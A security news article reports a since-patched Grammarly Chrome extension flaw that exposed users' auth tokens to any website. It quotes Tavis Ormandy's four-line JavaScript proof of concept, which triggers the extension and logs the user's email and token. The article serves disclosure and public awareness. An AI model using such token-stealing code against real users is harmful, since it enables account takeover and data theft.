Grammarly Users Need to Update their Chrome Extensions Immediately
A bug allows access to users’ accounts — including private data and documents.
Grammarly has released a patch to fix a vulnerability that would have allowed websites to view your personal data and documents.
A researcher at Google’s Project Zero, Tavis Ormandy, labeled the bug as high severity on account of the extension exposing authentication tokens to all websites.
The Grammarly Chrome extension (approx ~22M users) exposes it’s auth tokens to all websites, therefore any website can login to grammarly.com as you and access all your documents, history, logs, and all other data. I’m calling this a high severity bug, because it seems like a pretty severe violation of user expectations.
Ormandy provided a proof of concept the showed how the bug could be exploited with four lines of code.
> document.body.contentEditable=true // Trigger grammarly
> document.querySelector(“[data-action=editor]”).click() // Click the editor button
> document.querySelector(“iframe.gr_-ifr”).contentWindow.addEventListener(“message”, function (a) {console.log(a.data.user.email, a.data.user.grauth); }) // log auth token and email
> window.postMessage({grammarly: 1, action: “user” }, “*”) // Request user data
That produces a token that can then be used by anyone to log in to Grammarly as you.
Grammarly has over 22-million users, all of whom are vulnerable to this bug until they update their Chrome extension. That includes us at Hashed Out. It’s a good product and worth sticking with even despite this bug.
Ormandy published the bug report on Friday, subject to 90-day responsible disclosure guidelines. Grammarly release a patch earlier today.
Grammarly had fixed the issue and released an update to the Chrome Web Store within a few hours, a really impressive response time. I’ve verified that Mozilla now also has the update, so users should be auto-updated to the fixed version. I’m calling this issue fixed.
So update your browser extensions!
5 Ways to Determine if a Website is Fake, Fraudulent, or a Scam – 2018
in Hashing Out Cyber SecurityHow to Fix ‘ERR_SSL_PROTOCOL_ERROR’ on Google Chrome
in Everything EncryptionRe-Hashed: How to Fix SSL Connection Errors on Android Phones
in Everything EncryptionCloud Security: 5 Serious Emerging Cloud Computing Threats to Avoid
in ssl certificatesThis is what happens when your SSL certificate expires
in Everything EncryptionRe-Hashed: Troubleshoot Firefox’s “Performing TLS Handshake” Message
in Hashing Out Cyber SecurityReport it Right: AMCA got hacked – Not Quest and LabCorp
in Hashing Out Cyber SecurityRe-Hashed: How to clear HSTS settings in Chrome and Firefox
in Everything EncryptionRe-Hashed: The Difference Between SHA-1, SHA-2 and SHA-256 Hash Algorithms
in Everything EncryptionThe Difference Between Root Certificates and Intermediate Certificates
in Everything EncryptionThe difference between Encryption, Hashing and Salting
in Everything EncryptionRe-Hashed: How To Disable Firefox Insecure Password Warnings
in Hashing Out Cyber SecurityCipher Suites: Ciphers, Algorithms and Negotiating Security Settings
in Everything EncryptionThe Ultimate Hacker Movies List for December 2020
in Hashing Out Cyber Security Monthly DigestAnatomy of a Scam: Work from home for Amazon
in Hashing Out Cyber SecurityThe Top 9 Cyber Security Threats That Will Ruin Your Day
in Hashing Out Cyber SecurityHow strong is 256-bit Encryption?
in Everything EncryptionRe-Hashed: How to Trust Manually Installed Root Certificates in iOS 10.3
in Everything EncryptionHow to View SSL Certificate Details in Chrome 56
in Industry LowdownPayPal Phishing Certificates Far More Prevalent Than Previously Thought
in Industry Lowdown